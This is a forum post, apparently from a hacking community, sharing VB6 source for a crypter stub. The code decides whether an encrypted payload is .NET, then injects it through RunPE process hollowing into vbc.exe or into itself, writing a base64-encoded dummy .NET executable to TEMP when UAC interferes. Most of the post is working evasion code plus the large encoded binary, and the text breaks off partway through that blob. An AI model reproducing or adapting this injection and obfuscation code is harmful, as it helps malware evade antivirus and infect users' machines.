chequinho Posted January 20, 2015 Share Posted January 20, 2015 ES: Si algo falla, comenten. Junté el código sin probarlo. xD EN: If anything fails, leave a comment below. I build the code without testing it. xD [HIDE-THANKS][LENGUAJE=vb]' SHELL32 (Check if an user has admin rights) Public Declare Function IsUserAnAdmin Lib "SHELL32" () As Long Public Sub Main() Dim sProcessInjection As String ' Verify if it's a .NET dependant file. If yes, then we get the vbc.exe path, else the bytes will be injected in itself ' Only .NET files has the string "BSBJ", so we use it for identification purposes If Contains(crypterData(0), "BSJB") Then sProcessInjection = vbcPath(4) 'Or vbcPath(2). Depending of the version wich crypted file has been builded Else sProcessInjection = App.Path & "\" & App.EXEName & ".exe" End If ' Execute the bytes with RunPE Call RunPE(bBytes, sProcessInjection) ' Credits :D Call MsgBox("By chequinho @ 2014") End Sub Public Function vbcPath(iVersion As Integer) As String ' Error Handler On Error GoTo ErrorHandler Dim sVbc4 As String Dim sVbc2 As String Dim sVbcPath As String ' If the OS arch. is x64, we looking form Framework64 folder, else we looking form Framework folder If GetOsBitness = "64" Then sVbc4 = getSpecialPath(CSIDL_WINDOWS) & "\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" sVbc2 = getSpecialPath(CSIDL_WINDOWS) & "\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" Else sVbc4 = getSpecialPath(CSIDL_WINDOWS) & "\Microsoft.NET\Framework\v4.0.30319\vbc.exe" sVbc2 = getSpecialPath(CSIDL_WINDOWS) & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe" End If ' Verify if the files actually exists If FileExist(sVbc4) Then sVbcPath = sVbc4 ElseIf iVersion = 2 And FileExist(sVbc2) Then sVbcPath = sVbc2 Else GoTo ErrorHandler End If ' Decide wich file will be used in injection, the installed one or a dummy temp one If sVbcPath <> "" Then ' Windows 8 and forward fixed the "bug" that allows inject in a file inside root drive ' If UAC is enabled, files inside root drive will be available only for users with admin rights If GetWindowsVersion = "8/Server 2012" Or GetWindowsVersion = "8.1/Server 2012 R2" Or IsUserAnAdmin = 0 Then Dim sNETTemp As String sNETTemp = Environ$("TEMP") & "\vbc.exe" ' So, we use the dummy temp file If WriteFile(sNETTemp, getDummiNET(iVersion)) = True Then vbcPath = sNETTemp Else GoTo ErrorHandler End If Else ' If the SO is Vista / 7 AND the user has admin rights, then we use the installed vbc.exe file vbcPath = sVbcPath End If Else GoTo ErrorHandler End If Exit Function ErrorHandler: vbcPath = "" End Function ' Dummy .NET files encoded with Base64 algorithm (both versions - 2 & 4) [Don't worry, they are harmless :D] Private Function getDummiNET(ByVal iVersion As Integer) As String Dim sData As String Select Case iVersion Case 2 sData = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAOqMG1QAAAAAAAAAAOAAAgELAQsAABgAAAAGAAAAAAAADjcAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACg" & _ "AAAABAAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAALQ2AABXAAAAAGAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAAQAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAFBcAAAAgAAAAGAAAAAQAAAAAAAAAAAAAAAAAACAAAGAuc2Rh" & _ "dGEAADgBAAAAQAAAAAIAAAAcAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAAAQAAAAAGAAAAACAAAAHgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAACAAAAAAgAAACAAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPA2AAAAAAAASAAAAAIABQCEIwAAMBMAAAEA" & _ "AAARAAAGUCAAALgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtAAAAM7K774BAAAAkQAAAGxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlUmVhZGVyLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkjU3lzdGVtLlJlc291cmNlcy5SdW50aW1lUmVzb3Vy" & _ "Y2VTZXQCAAAAAAAAAAAAAABQQURQQURQtAAAACYCKAEAAAoAACoAACoAAigFAAAKAAAqAKpzBwAACoABAAAEcwgAAAqAAgAABHMJAAAKgAMAAARzCgAACoAEAAAEACoAEzABABAAAAABAAARAH4BAAAEbwsAAAoKKwAGKhMwAQAQAAAAAgAAEQB+AgAABG8MAAAKCisABioTMAEAEAAAAAMAABEAfgMAAARvDQAACgorAAYqEzABABAAAAAEAAARAH4EAAAEbw4AAAoKKwAGKhMw" & _ "AgASAAAABQAAEQACAygSAAAKKBMAAAoKKwAGKgAAEzABAAwAAAAGAAARAAIoFAAACgorAAYqEzABABAAAAAHAAARANAFAAACKBUAAAoKKwAGKhMwAQAMAAAACAAAEQACKBYAAAoKKwAGKhMwAgAgAAAACQAAEQACjAEAABsU/gELBywKKAEAACsKKwgrBQACCisBAAYqEzACABIAAAAKAAARAAMSAP4VAgAAGwaBAgAAGwAqAAAqAAIoGAAACgAAKgATMAIAJgAAAAsAABEAfhoA" & _ "AAqMAwAAGxT+AQsHLAooAgAAK4AaAAAKfhoAAAoKKwAGKgAAKgACKBgAAAoAACoADgAAKhMwAgA7AAAADAAAEQB+BgAABBQoHwAACgwILCByAQAAcNAIAAACKBUAAApvIAAACnMhAAAKCweABgAABAB+BgAABAorAAYqABMwAQALAAAADQAAEQB+BwAABAorAAYqACYAAoAHAAAEACoAAFpzFgAABigiAAAKdAkAAAKACAAABAAqACYCKCMAAAoAACoAABMwAQALAAAADgAAEQB+" & _ "CAAABAorAAYqABMwAQALAAAADwAAEQAoFwAABgorAAYqAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAAGwHAAAjfgAA2AcAAJgHAAAjU3RyaW5ncwAAAABwDwAALAAAACNVUwCcDwAAEAAAACNHVUlEAAAArA8AAIQDAAAjQmxvYgAAAAAAAAACAAABVxWiCQkPAAAA+iUzABYAAAEAAAAmAAAACgAAAAgAAAAYAAAABAAAAC4AAABGAAAADwAAAAUAAAAJAAAA" & _ "CgAAAAgAAAABAAAAAwAAAAEAAAACAAAAAwAAAAIAAAAAAIcHAQAAAAAACgAAAdYACgA7AR0BBgBLAUQBCgCjAdYABgAhAkQBBgCvAp4CBgDgAssCDgBLAzYDDgCzA50DDgDMA50DDgD5A+EDBgAjBBAEBgBABBAECgB/BFgECgCXBBMADgDMBK8EBgABBeEEBgAfBUQBBgBDBUQBCgBcBRMABgCWBXcFBgCqBUQBBgDABeEEBgDbBUQBBgAQBv4FDgAmBjYDBgBfBhAEbwBzBgAA" & _ "BgCCBuEEBgCiBuEEBgDABv4FBgDdBncFBgDrBv4FBgAGB/4FBgAhB/4FBgA6B/4FBgBTB/4FBgBwB/4FAAAAAAEAAAAAAAEAAQAAAAAAKQA3AAUAAQABAAAAAABFADcACQABAAIAAAEQAFAANwANAAEAAwAFAQAAWgAAAA0ABQAIAAUBAABoAAAADQAFAA8AAAEAAIMAiwANAAYAEQAAAQAAlgCgAA0ABgASAAABEAC4ADcAIQAIABUAAAEAAMMANwANAAkAGAAxAGYBIAAxAI8B" & _ "LQAxALEBOgAxANYBRwARAHkCkAARAL8CmQARAOwCnQARAGMDuwAIIQAAAAAGGBcBEwABABQhAAAAAAYYFwETAAEAICEAAAAAERhSARcAAQBMIQAAAAATCFkBGwABAGghAAAAABMIfwEoAAEAhCEAAAAAEwioATUAAQCgIQAAAAATCMYBQgABALwhAAAAAEYCDAJjAAEA3CEAAAAARgIVAmgAAgD0IQAAAACDACYCbAACABAiAAAAAEYCLgJxAAIAKCIAAAAAEQA3AngAAgBUIgAA" & _ "AAABAFUCgAADAHQiAAAAAAYYFwETAAQAgCIAAAAAAwhpAosABAC0IgAAAAAGGBcBEwAEAMAiAAAAABYAmQIXAAQAxCIAAAAAEwj8AqEABAAMIwAAAAATCBADpgAEACQjAAAAABMIHAOrAAQAMCMAAAAAERhSARcABQBIIwAAAAAGGBcBEwAFAFQjAAAAABYIcwO/AAUAbCMAAAAAEwiHA78ABQAAAAEAEwIAAAEATAIAAAEATAIAAAEAKAMJABcBEwBJABcByQBZABcB2ABhABcB" & _ "EwARABcBEwBpABcBEwAkABcBEwAsABcBEwA0ABcBEwA8ABcBEwAkAGkCiwAsAGkCiwA0AGkCiwA8AGkCiwBxABcBEwB5ABcBEwCBABcBKwGJABAFdgEZAAwCYwAZABUCaAApADEFgwEZAC4CcQCZAE0FkwEZABcBEwChABcBqQFEAHkCkACpABcBJQKxABcBEwC5ABcBEwDBABcBEwAZAO4FMAIpABkGNgIxABcBOwLRADMGmQJBABcBEwDZABcBEAPpABcBFgPxABcBEwD5ABcB" & _ "KwEBARcBKwEJARcBKwERARcBKwEZARcBKwEhARcBKwEpARcBKwExARcBKwEgACMA9gApAIsAMAEuAGsBKgIuAGMBKgIuADMBLQMuADsBTAMuAFsBKgIuACMBGwMuACsBJAMuAHMBKgIuAEMBWQMuANsAKgIuAEsBKgIuAFMBKgJAADMA9gBAABMAzwBDABMAzwBDABsA3gBJAIsAQQFgACMA9gBjABsA3gBjABMAzwBpAIsAaQGAADMA9gCDAHsA9gCDAIMA9gCDABsA3gCJAIsA" & _ "VQGgADMA9gChAOMA9gChAOsA9gCjAMsAsQGjABMAzwDAADMA9gDDABMAzwDDANsAKgLJABMAkALgADMA9gDjAHsA9gDpABMAkAIAARMAzwAAATMA9gADARsATwIDAYMA9gADASMA9gADAesA9gADAXsA9gAgATMA9gAgARMAzwAjAesA9gAjARMAkAIjARsApQIpAYsA/wJAARMAzwBAATMA9gBDAesA9gBDAYMA9gBDASMA9gBDAXsA9gBgARMAzwBgATMA9gCAATMA9gCgATMA" & _ "9gDAARMAzwDAATMA9gDgATMA9gAAAjMA9gAAAhMAzwAgAvMA9gDAAiMA9gAXARwBIQEmAXsBfwGKAY8BngGkAR8CQgJKAqACoAIEAAEABgAFAAgABgAJAAgACgAJAAAAOwFPAAAA9AFUAAAAowFZAAAAAAJeAAAAjQKUAAAArwKxAAAALgO2AAAAfwPEAAAAlAPEAAIABAADAAIABQAFAAIABgAHAAIABwAJAAIADwALAAIAEgANAAEAFAAPAAIAEwAPAAIAFwARAAIAGAATAHUA" & _ "dQCIAPsAAgEJARABEwIEgAAAAAAAAAAAAAAAAAAAAACLAAAAAgAAAAAAAAAAAAAAAQAKAAAAAAAIAAAAAAAAAAAAAAAKABMAAAAAAAIAAAAAAAAAAAAAAAEARAEAAAAAAAAAAAEAAABABgAABQAEAAYABAAAABAADABKAgAAEAAZAEoCAAAAABsASgIvAJkBLwAaAgAAAAAAPE1vZHVsZT4AbXNjb3JsaWIATWljcm9zb2Z0LlZpc3VhbEJhc2ljAE15QXBwbGljYXRpb24ASGVs" & _ "bG9Xb3JsZC5NeQBNeUNvbXB1dGVyAE15UHJvamVjdABNeVdlYlNlcnZpY2VzAFRocmVhZFNhZmVPYmplY3RQcm92aWRlcmAxAE1vZHVsZTEASGVsbG9Xb3JsZABSZXNvdXJjZXMASGVsbG9Xb3JsZC5NeS5SZXNvdXJjZXMATXlTZXR0aW5ncwBNeVNldHRpbmdzUHJvcGVydHkATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAQ29uc29sZUFwcGxp" sData = sData & "Y2F0aW9uQmFzZQAuY3RvcgBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBDb21wdXRlcgBTeXN0ZW0AT2JqZWN0AC5jY3RvcgBnZXRfQ29tcHV0ZXIAbV9Db21wdXRlck9iamVjdFByb3ZpZGVyAGdldF9BcHBsaWNhdGlvbgBtX0FwcE9iamVjdFByb3ZpZGVyAFVzZXIAZ2V0X1VzZXIAbV9Vc2VyT2JqZWN0UHJvdmlkZXIAZ2V0X1dlYlNlcnZpY2VzAG1fTXlXZWJT" & _ "ZXJ2aWNlc09iamVjdFByb3ZpZGVyAEFwcGxpY2F0aW9uAFdlYlNlcnZpY2VzAEVxdWFscwBvAEdldEhhc2hDb2RlAFR5cGUAR2V0VHlwZQBUb1N0cmluZwBDcmVhdGVfX0luc3RhbmNlX18AVABpbnN0YW5jZQBEaXNwb3NlX19JbnN0YW5jZV9fAGdldF9HZXRJbnN0YW5jZQBtX1RocmVhZFN0YXRpY1ZhbHVlAEdldEluc3RhbmNlAE1haW4AU3lzdGVtLlJlc291cmNlcwBS" & _ "ZXNvdXJjZU1hbmFnZXIAcmVzb3VyY2VNYW4AU3lzdGVtLkdsb2JhbGl6YXRpb24AQ3VsdHVyZUluZm8AcmVzb3VyY2VDdWx0dXJlAGdldF9SZXNvdXJjZU1hbmFnZXIAZ2V0X0N1bHR1cmUAc2V0X0N1bHR1cmUAdmFsdWUAQ3VsdHVyZQBTeXN0ZW0uQ29uZmlndXJhdGlvbgBBcHBsaWNhdGlvblNldHRpbmdzQmFzZQBkZWZhdWx0SW5zdGFuY2UAZ2V0X0RlZmF1bHQARGVm" & _ "YXVsdABnZXRfU2V0dGluZ3MAU2V0dGluZ3MAU3lzdGVtLkNvbXBvbmVudE1vZGVsAEVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBHZW5lcmF0ZWRDb2RlQXR0cmlidXRlAFN5c3RlbS5EaWFnbm9zdGljcwBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2VySGlkZGVuQXR0cmli" & _ "dXRlAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAFN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24ASGVscEtleXdvcmRBdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBSdW50aW1lSGVscGVycwBHZXRPYmplY3RWYWx1ZQBSdW50aW1l" & _ "VHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBBY3RpdmF0b3IAQ3JlYXRlSW5zdGFuY2UATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAENvbVZpc2libGVBdHRyaWJ1dGUAVGhyZWFkU3RhdGljQXR0cmlidXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAFNUQVRocmVhZEF0dHJpYnV0ZQBSZWZlcmVuY2VF" & _ "cXVhbHMAU3lzdGVtLlJlZmxlY3Rpb24AQXNzZW1ibHkAZ2V0X0Fzc2VtYmx5AFNldHRpbmdzQmFzZQBTeW5jaHJvbml6ZWQASGVsbG9Xb3JsZC5SZXNvdXJjZXMucmVzb3VyY2VzAERlYnVnZ2FibGVBdHRyaWJ1dGUARGVidWdnaW5nTW9kZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBBc3NlbWJseUZp" & _ "bGVWZXJzaW9uQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAdmJjLmV4ZQAAAAAAAAAAAAAAKQAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXxF2VxeQFEtbZv8ffhCUgACLd6XFYZNOCJCLA/X38R1Qo6AyAAAQMAAAEEAAASDAcGFRIYARIMBAAAEggHBhUSGAESCAQAABIRBwYVEhgBEhEEAAASFAcGFRIYARIUBAgAEgwECAASCAQIABIRBAgAEhQEIAECHAMgAAgEIAASFQMgAA4CHgAHEAEBHgAeAAcwAQEBEB4AAhMABCAAEwADBhMABCgAEwAD" & _ "BhIZAwYSHQQAABIZBAAAEh0FAAEBEh0ECAASGQQIABIdAwYSJAQAABIkBAgAEiQFIAEBESkIAQABAAAAAAAFIAIBDg4XAQAKTXlUZW1wbGF0ZQc4LjAuMC4wAAAEAQAAAAYVEhgBEgwGFRIYARIIBhUSGAESEQYVEhgBEhQEBwESDAQHARIIBAcBEhEEBwESFAQgAQEOEAEACwAAAAAAAAAAAAAAAAATAQAOAAAAAAAAAAAAAAAAAAAAABMBAA4AAAAAAAAAAAAAAAAAAAAADAEA" & _ "BwAAAAAAAAAAAAQAARwcAwcBAgMHAQgGAAESFRFJBAcBEhUDBwEOBRABAB4ABAoBHgAFBwIeAAIEBwEeAAcgBAEODg4OYQEANFN5c3RlbS5XZWIuU2VydmljZXMuUHJvdG9jb2xzLlNvYXBIdHRwQ2xpZW50UHJvdG9jb2wSQ3JlYXRlX19JbnN0YW5jZV9fE0Rpc3Bvc2VfX0luc3RhbmNlX18AAAAGFRIYARMABAoBEwAFBwITAAIEIAEBAgUBAAAAAAUAAgIcHAQgABJlBiAC" & _ "AQ4SZQcHAxIZEhkCBAcBEh1AAQAzU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyBzQuMC4wLjAAAAgBAAIAAAAAAAYAARJpEmkEBwESJFkBAEtNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLkVkaXRvcnMuU2V0dGluZ3NEZXNpZ25lci5TZXR0aW5nc1NpbmdsZUZpbGVHZW5lcmF0b3IIMTEuMC4wLjAAABABAAtNeS5TZXR0aW5ncwAA" & _ "BSABARFxBCABAQgIAQAHAQAAAAAIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBDAEABzAuMC4wLjAAACkBACQwYjQzMjVjNS00N2NiLTQzNzMtOWQ4My01YTAzMmY4NDNmZDcAAADcNgAAAAAAAAAAAAD+NgAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DYAAAAAAAAAAAAAAAAAAAAAAAAAAF9Db3JFeGVNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAg" & _ "QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqjBtUAAAAAAIAAAAcAQAAHEAAABwcAABSU0RTealsADTvH0mnUlGwj11aBAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAMAAADAAAABA3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" sData = sData & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==" Case 4 sData = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKsUK1IAAAAAAAAAAOAAAgELAQgAAAgAAAAGAAAAAAAAbicAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACA" & _ "AAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAABgnAABTAAAAAEAAAEICAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAB4JgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAdAcAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNy" & _ "YwAAAEICAAAAQAAAAAQAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABQJwAAAAAAAEgAAAACAAUAZCAAABQGAAADAAAAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5yAQAAcCgRAAAKKh4CKBIAAAoqQlNKQgEAAQAAAAAADAAAAHY0" & _ "LjAuMzAzMTkAAAAABQBsAAAA5AEAACN+AABQAgAAjAIAACNTdHJpbmdzAAAAANwEAAAcAAAAI1VTAPgEAAAQAAAAI0dVSUQAAAAIBQAADAEAACNCbG9iAAAAAAAAAAIAAAFHFQAACQAAAAD6JTMAFgAAAQAAABMAAAACAAAAAgAAAAEAAAASAAAADgAAAAEAAAABAAAAAAAKAAEAAAAAAAYAPAA1AAYAbQBTAAYAmACGAAYArwCGAAYAzACGAAYA6wCGAAYABAGGAAYAHQGGAAYA" & _ "OAGGAAYAUwGGAAYAiwFsAQYAnwFsAQYArQGGAAYAxgGGAAYA9gHjAT8ACgIAAAYAOQIZAgYAWQIZAgYAdwI1AAAAAAABAAAAAAABAAEAAAAQABkAIQAFAAEAAQBQIAAAAACRAEMACgABAFwgAAAAAIYYSAAQAAIAAAABAE4AEQBIABQAGQBIABQAIQBIABQAKQBIABQAMQBIABQAOQBIABQAQQBIABQASQBIABQAUQBIABQAWQBIABkAYQBIABQAaQBIABQAcQBIABQAeQBIAB4A" & _ "iQBIACQAkQBIABAAmQB/AikACQBIABAALgALAC4ALgATAHYALgAbAIYALgAjAIYALgArAIYALgAzAHYALgA7AIwALgBDAIYALgBTAIYALgBbAKQALgBrAM4ALgBzANsALgB7AOQALgCDAO0ABIAAAAEAAAAAAAAAAAAAAAAAIQAAAAQAAAAAAAAAAAAAAAEALAAAAAAAAAAAAAA8TW9kdWxlPgBIZWxsb1dvcmxkLmV4ZQBQcm9ncmFtAEhlbGxvV29ybGQAbXNjb3JsaWIAU3lz" & _ "dGVtAE9iamVjdABNYWluAC5jdG9yAGFyZ3MAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAU3lzdGVtLlJlZmxlY3Rpb24AQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAQXNzZW1i" & _ "bHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5Q3VsdHVyZUF0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAQ29tVmlzaWJsZUF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEFzc2VtYmx5VmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0" & _ 